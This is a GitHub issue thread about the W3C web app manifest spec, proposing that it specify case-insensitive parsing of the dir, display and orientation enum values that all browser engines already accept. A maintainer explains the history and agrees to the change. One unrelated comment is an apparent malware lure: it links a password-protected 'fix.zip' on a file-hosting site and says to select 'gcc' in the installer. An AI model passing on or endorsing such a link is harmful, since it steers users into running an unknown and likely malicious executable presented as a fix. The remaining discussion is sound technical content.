### ISSUE TITLE
Clarify case-insensitive parsing for enum values

### ISSUE THREAD

**Issue by christianliebel** [w3c/manifest#1142]
The parsing algorithms of the current specification don't mention case-insensitive parsing of the enum-based members (`dir`, `display`, `orientation`), but all browser engines have implemented this:

| User Agent | [`dir`](https://www.w3.org/TR/appmanifest/#dfn-process-the-dir-member) | [`display`](https://www.w3.org/TR/appmanifest/#dfn-process-the-display-member) | [`orientation`](https://www.w3.org/TR/appmanifest/#dfn-process-the-orientation-member) |
| --- | --- | --- | --- |
| Chromium | 🤷🏼‍♂️ [case-insensitive](https://github.com/chromium/chromium/blob/1a2fa6cafcb284d139a1771e6a8c2478c100d797/third_party/blink/common/manifest/manifest_util.cc#L47) | 🤷🏼‍♂️ [case-insensitive](https://github.com/chromium/chromium/blob/be1c4cc5948f4633fdd91b7386f98ecf1bfac355/third_party/blink/common/manifest/manifest_util.cc#L69) | 🤷🏼‍♂️ [case-insensitive](https://github.com/chromium/chromium/blob/be1c4cc5948f4633fdd91b7386f98ecf1bfac355/third_party/blink/common/manifest/manifest_util.cc#L127) |
| Gecko | 🤷🏼‍♂️ [case-insensitive](https://github.com/mozilla/gecko-dev/blob/91c9ad75166a41d6d82d0c913e74ddf26709e4c0/dom/manifest/ManifestProcessor.sys.mjs#L137) | 🤷🏼‍♂️ [case-insensitive](https://github.com/mozilla/gecko-dev/blob/490a1df802d8872f996f8ef4093d54e3c854c8f9/dom/manifest/ManifestProcessor.sys.mjs#L193) | 🤷🏼‍♂️ [case-insensitive](https://github.com/mozilla/gecko-dev/blob/490a1df802d8872f996f8ef4093d54e3c854c8f9/dom/manifest/ManifestProcessor.sys.mjs#L174) |
| WebKit | 🤷🏼‍♂️ [case-insensitive](https://github.com/WebKit/WebKit/blob/cb7f341491b77d31200bd7d273d7a89ae17a52fc/Source/WebCore/Modules/applicationmanifest/ApplicationManifestParser.cpp#L191) | 🤷🏼‍♂️ [case-insensitive](https://github.com/WebKit/WebKit/blob/cb7f341491b77d31200bd7d273d7a89ae17a52fc/Source/WebCore/Modules/applicationmanifest/ApplicationManifestParser.cpp#L217) | 🤷🏼‍♂️ [case-insensitive](https://github.com/WebKit/WebKit/blob/cb7f341491b77d31200bd7d273d7a89ae17a52fc/Source/WebCore/Modules/applicationmanifest/ApplicationManifestParser.cpp#L244) |

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by marcoscaceres** [comment]
Bit of history... the original version of the spec did... then we did the IDL conversion... then we got rid of the IDL conversion... but then we forgot to revert back to normalizing the case. 

At the same time, we were originally being a bit too liberal with the what we accepted. We shouldn't have done case normalization for enum values, but given that's what's implemented by everyone, we might as well updated the spec to match.
